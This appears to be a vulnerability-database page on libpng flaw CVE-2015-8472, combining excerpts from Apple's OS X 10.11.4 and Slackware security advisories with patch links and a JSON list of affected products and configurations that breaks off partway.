OpenSSL Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A remote attacker may be able to cause a denial of service Description: A memory leak existed in OpenSSL versions prior to 0.9.8zh. This issue was addressed by updating OpenSSL to version 0.9.8zh. CVE-ID CVE-2015-3195
Python Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .png file may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libpng versions prior to 1.6.20. These were addressed by updating libpng to version 1.6.20. CVE-ID CVE-2014-9495 CVE-2015-0973 CVE-2015-8126 : Adam Mariš CVE-2015-8472 : Adam Mariš
QuickTime Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted FlashPix Bitmap Image may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1767 : Francis Provencher from COSIG CVE-2016-1768 : Francis Provencher from COSIG
QuickTime Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted Photoshop document may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1769 : Francis Provencher from COSIG
Reminders Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Clicking a tel link can make a call without prompting the user Description: A user was not prompted before invoking a call. This was addressed through improved entitlement checks. CVE-ID CVE-2016-1770 : Guillaume Ross of Rapid7 and Laurent Chouinard of Laurent.ca
Ruby Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: An unsafe tainted string usage vulnerability existed in versions prior to 2.0.0-p648. This issue was addressed by updating to version 2.0.0-p648. CVE-ID CVE-2015-7551
Security Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to check for the existence of arbitrary files Description: A permissions issue existed in code signing tools. This was addressed though additional ownership checks. CVE-ID CVE-2016-1773 : Mark Mentovai of Google Inc.
Security Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution Description: A memory corruption issue existed in the ASN.1 decoder. This issue was addressed through improved input validation. CVE-ID CVE-2016-1950 : Francis Gabriel of Quarkslab
Tcl
Available for:
OS X Yosemite v10.10.5 and OS X El Capitan v10.11 to v10.11.3
Impact: Processing a maliciously crafted .png file may lead to
arbitrary code execution
Description: Multiple vulnerabilities existed in libpng versions
prior to 1.6.20. These were addressed by removing libpng.
CVE-ID
CVE-2015-8126 : Adam Mariš
TrueTypeScaler Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2016-1775 : 0x1byte working with Trend Micro's Zero Day Initiative (ZDI)
Wi-Fi Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker with a privileged network position may be able to execute arbitrary code Description: A frame validation and memory corruption issue existed for a given ethertype. This issue was addressed through additional ethertype validation and improved memory handling. CVE-ID CVE-2016-0801 : an anonymous researcher CVE-2016-0802 : an anonymous researcher
OS X El Capitan 10.11.4 includes the security content of Safari 9.1. https://support.apple.com/kb/HT206171
OS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJW8JQFAAoJEBcWfLTuOo7tZSYP/1bHFA1qemkD37uu7nYpk/q6 ARVsPgME1I1+5tOxX0TQJgzMBmdQsKYdsTiLpDk5HTuv+dAMsFfasaUItGk8Sz1w HiYjSfVsxL+Pjz3vK8/4/fsi2lX6472MElRw8gudITOhXtniGcKo/vuA5dB+vM3l Jy1NLHHhZ6BD2t0bBmlz41mZMG3AMxal2wfqE+5LkjUwASzcvC/3B1sh7Fntwyau /71vIgMQ5AaETdgQJAuQivxPyTlFduBRgLjqvPiB9eSK4Ctu5t/hErFIrP2NiDCi UhfZC48XbiRjJfkUsUD/5TIKnI+jkZxOnch9ny32dw2kUIkbIAbqufTkzsMXOpng O+rI93Ni7nfzgI3EkI2bq+C+arOoRiveWuJvc3SMPD5RQHo4NCQVs0ekQJKNHF78 juPnY29n8WMjwLS6Zfm+bH+n8ELIXrmmEscRztK2efa9S7vJe+AgIxx7JE/f8OHF i9K7UQBXFXcpMjXi1aTby/IUnpL5Ny4NVwYwIhctj0Mf6wTH7uf/FMWYIQOXcIfP Izo+GXxNeLd4H2ypZ+UpkZg/Sn2mtCd88wLc96+owlZPBlSqWl3X1wTlp8i5FP2X qlQ7RcTHJDv8jPT/MOfzxEK1n/azp45ahHA0o6nohUdxlA7PLci9vPiJxqKPo/0q VZmOKa8qMxB1L/JmdCqy =mZR+ -----END PGP SIGNATURE----- .
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/libpng-1.4.18-x86_64-1_slack14.1.txz: Upgraded. Fixed incorrect implementation of png_set_PLTE() that uses png_ptr not info_ptr, that left png_set_PLTE() open to the CVE-2015-8126 vulnerability. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8472 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/libpng-1.2.55-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/libpng-1.2.55-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/libpng-1.4.18-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/libpng-1.4.18-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/libpng-1.4.18-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/libpng-1.4.18-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libpng-1.4.18-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libpng-1.4.18-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libpng-1.4.18-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libpng-1.4.18-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libpng-1.6.20-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libpng-1.6.20-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 0ee9224ad5684fad22c1b0c90605c63b libpng-1.2.55-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: d9b29264e8312baf0c511c81ad779e59 libpng-1.2.55-x86_64-1_slack13.0.txz
Slackware 13.1 package: 28f6f162e3808d1dcdf6a3a98a8ccd69 libpng-1.4.18-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: 156846c2db1a60cc840ed6e545ad9ec3 libpng-1.4.18-x86_64-1_slack13.1.txz
Slackware 13.37 package: 6c2eb1e0434a742f837b3d136d09fa89 libpng-1.4.18-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: 099974c30fce3f57ba60249e6cd4ad99 libpng-1.4.18-x86_64-1_slack13.37.txz
Slackware 14.0 package: b546c957f439e78bbee7bdd429953a76 libpng-1.4.18-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 66903cc8d9eea2c47698ff0776da13e2 libpng-1.4.18-x86_64-1_slack14.0.txz
Slackware 14.1 package: f2dfcb4aa0a05fccf81f60f913bc7e8e libpng-1.4.18-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: c06efdbec225394a156860a4f571dd59 libpng-1.4.18-x86_64-1_slack14.1.txz
Slackware -current package: 6f2e6e7f5f8c3760a372cc9ae3130060 l/libpng-1.6.20-i586-1.txz
Slackware x86_64 -current package: 8be8af75ec81e9463adf345c0bf48432 l/libpng-1.6.20-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg libpng-1.4.18-i486-1_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201601-0495", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "libpng", "version": "1.4.15" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "libpng", "version": "1.5.4" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "libpng", "version": "1.4.16" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "libpng", "version": "1.5.5" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "libpng", "version": "1.4.17" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "libpng", "version": "1.4.14" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "libpng", "version": "1.5.1" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "libpng", "version": "1.5.6" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "libpng", "version": "1.5.2" }, { "model": "libpng", "scope": "eq", "trust": 1.6, "vendor": "libpng", "version": "1.5.3" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.22" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.5.12" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.44" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.5.19" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.4.13" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.15" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.4.8" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.54" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.11" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.3" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.2" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.4.4" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.4" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.18" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.1" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.53" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.17" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.4" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.15" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.13" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.34" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.4.5" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.5.14" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.29" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.37" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.30" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.31" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.47" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.8" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.49" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.14" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.36" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.4.12" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.5.10" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.5.15" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.19" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.4.9" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.4.10" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.11" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.5.20" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.41" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.4.1" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.10" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.12" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.50" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.4.0" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.45" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.5.17" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.5.22" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.16" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.16" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.5" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.4.2" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.46" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.5.8" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.38" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.5.7" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.21" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.1" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.5.21" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.26" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.24" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.17" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.5.23" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.6" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.5.16" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.18" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.13" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.51" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.19" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.25" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.28" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.48" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.3" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.20" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.5.9" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.23" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.43" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.4.11" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.5.11" }, { "model": "mac os x", "scope": "lte", "trust": 1.0, "vendor": "apple", "version": "10.11.3" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.4.7" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.5.24" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.0.64" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.12" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.4.3" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.10" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.2" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.32" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.14" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.7" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.33" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.5.13" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.5.18" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.9" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.35" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.52" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.0" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.40" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.6.0" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.27" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.4.6" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.39" }, { "model": "libpng", "scope": "eq", "trust": 1.0, "vendor": "libpng", "version": "1.2.42" }, { "model": "libpng", "scope": "lt", "trust": 0.8, "vendor": "png group", "version": "1.6.x" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.9.5" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.11 to 10.11.3" }, { "model": "libpng", "scope": "eq", "trust": 0.8, "vendor": "png group", "version": "1.1.x" }, { "model": "libpng", "scope": "eq", "trust": 0.8, "vendor": "png group", "version": "1.5.25" }, { "model": "libpng", "scope": "eq", "trust": 0.8, "vendor": "png group", "version": "1.2.55" }, { "model": "jdk", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "7 update 91" }, { "model": "jdk", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "6 update 105" }, { "model": "jre", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "7 update 91" }, { "model": "jre", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "6 update 105" }, { "model": "libpng", "scope": "lt", "trust": 0.8, "vendor": "png group", "version": "1.5.x" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.10.5" }, { "model": "libpng", "scope": "eq", "trust": 0.8, "vendor": "png group", "version": "1.4.18" }, { "model": "libpng", "scope": "eq", "trust": 0.8, "vendor": "png group", "version": "1.6.20" }, { "model": "java se", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "embedded 8 update 65" }, { "model": "jdk", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "8 update 66" }, { "model": "jre", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "8 update 66" }, { "model": "libpng", "scope": "lt", "trust": 0.8, "vendor": "png group", "version": "1.4.x" }, { "model": "libpng", "scope": "lt", "trust": 0.8, "vendor": "png group", "version": "1.2.x" }, { "model": "libpng", "scope": "eq", "trust": 0.8, "vendor": "png group", "version": "1.3.x" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-006846" }, { "db": "CNNVD", "id": "CNNVD-201512-189" }, { "db": "NVD", "id": "CVE-2015-8472" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "10.11.3", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.18:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.17:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.17:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.16:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.23:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.4.17:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.4.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.4.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.4.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.4.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.49:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.48:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.47:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.40:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.2.33:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.14:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.13:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.21:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.20:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.13:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.12:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.5.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.4.14:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.4.13:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.4.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.19:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.12:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.11:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:libpng:libpng:1.6.4:*:*:*:*:*:*:*", 